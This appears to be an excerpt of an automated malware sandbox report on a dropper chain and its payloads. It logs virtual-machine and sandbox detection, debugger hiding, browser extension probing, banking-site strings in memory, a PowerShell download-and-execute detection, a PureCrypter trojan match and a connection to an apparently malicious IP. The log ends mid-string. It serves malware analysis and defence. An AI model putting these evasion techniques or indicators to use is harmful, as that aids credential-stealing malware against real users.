Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 7900	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 7448	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 4428	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 3692	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 7888	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe TID: 7252	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe TID: 360	Thread sleep time: -108000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe TID: 6600	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsDHCAECGIEB.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C76EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C76EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: skotes.exe, 00000018.00000002.5411293515.0000000001259000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2409398510.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000018.00000002.5411293515.0000000001259000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000018.00000002.5411293515.0000000001219000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000019.00000002.5401399081.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.5403969374.000000000329A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.5403969374.00000000032F5000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.5403588719.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.5403588719.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000021.00000002.5403786166.000000000327F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bfrB
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 9305c7ab92.exe, 00000022.00000002.3043088426.0000000000C62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 9305c7ab92.exe, 0000002C.00000002.3470246270.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001306000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000018.00000002.5405863106.0000000000CBD000.00000040.00000001.01000000.0000000D.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3234040223.0000000005FD2000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3228445855.0000000000C8E000.00000040.00000001.01000000.00000010.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3234690493.000000000638F000.00000040.00000800.00020000.00000000.sdmp, 9305c7ab92.exe, 00000022.00000002.3042100460.00000000004A3000.00000040.00000001.01000000.00000011.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3386796144.0000000006323000.00000040.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3376407138.0000000000C8E000.00000040.00000001.01000000.00000010.sdmp, 9fc857756c.exe, 00000025.00000000.3090607794.000000000074F000.00000080.00000001.01000000.00000012.sdmp, 9fc857756c.exe, 00000025.00000002.3246622321.000000000074F000.00000040.00000001.01000000.00000012.sdmp, 6ca8f7e5e2.exe, 0000002B.00000002.3777878072.0000000006633000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: rundll32.exe, 00000027.00000002.5403295633.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%:,R
Source: 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001110000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3O
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: rundll32.exe, 00000027.00000002.5403295633.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 6ca8f7e5e2.exe, 0000001C.00000002.3233570271.0000000005B43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000002.2409398510.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: rundll32.exe, 00000019.00000002.5401399081.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: rundll32.exe, 0000001E.00000002.5403588719.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: rundll32.exe, 00000019.00000002.5401399081.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2409398510.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareVZ
Source: file.exe, 00000000.00000002.2407741412.0000000000973000.00000040.00000001.01000000.00000003.sdmp, DocumentsDHCAECGIEB.exe, 00000015.00000002.2450116607.000000000074D000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.2487730127.0000000000CBD000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000018.00000002.5405863106.0000000000CBD000.00000040.00000001.01000000.0000000D.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3234040223.0000000005FD2000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3228445855.0000000000C8E000.00000040.00000001.01000000.00000010.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3234690493.000000000638F000.00000040.00000800.00020000.00000000.sdmp, 9305c7ab92.exe, 00000022.00000002.3042100460.00000000004A3000.00000040.00000001.01000000.00000011.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3386796144.0000000006323000.00000040.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3376407138.0000000000C8E000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_054A01FF Start: 054A045F End: 054A0266		21_2_054A01FF
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_054A0BFA Start: 054A0CBC End: 054A0C0E		21_2_054A0BFA

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsDHCAECGIEB.exe

Code function: 21_2_054A0B84 rdtsc

21_2_054A0B84

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C83AC62

Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_0059652B mov eax, dword ptr fs:[00000030h]	21_2_0059652B
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_0059A302 mov eax, dword ptr fs:[00000030h]	21_2_0059A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B0A302 mov eax, dword ptr fs:[00000030h]	22_2_00B0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00B0652B mov eax, dword ptr fs:[00000030h]	22_2_00B0652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B0A302 mov eax, dword ptr fs:[00000030h]	24_2_00B0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00B0652B mov eax, dword ptr fs:[00000030h]	24_2_00B0652B

Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C83AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C83AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.209 80

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9305c7ab92.exe PID: 3872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6ca8f7e5e2.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9305c7ab92.exe PID: 2968, type: MEMORYSTR

Detected PureCrypter Trojan

Source: 6ca8f7e5e2.exe, 0000001C.00000003.2920638150.0000000005AB1000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1222396-1-3,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1085156-1-3,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-63,eej45377:646690,v1_disable_abandoned_cart:506070,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,domexpansion_v1:408272,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-484,P-D-1138318-1-3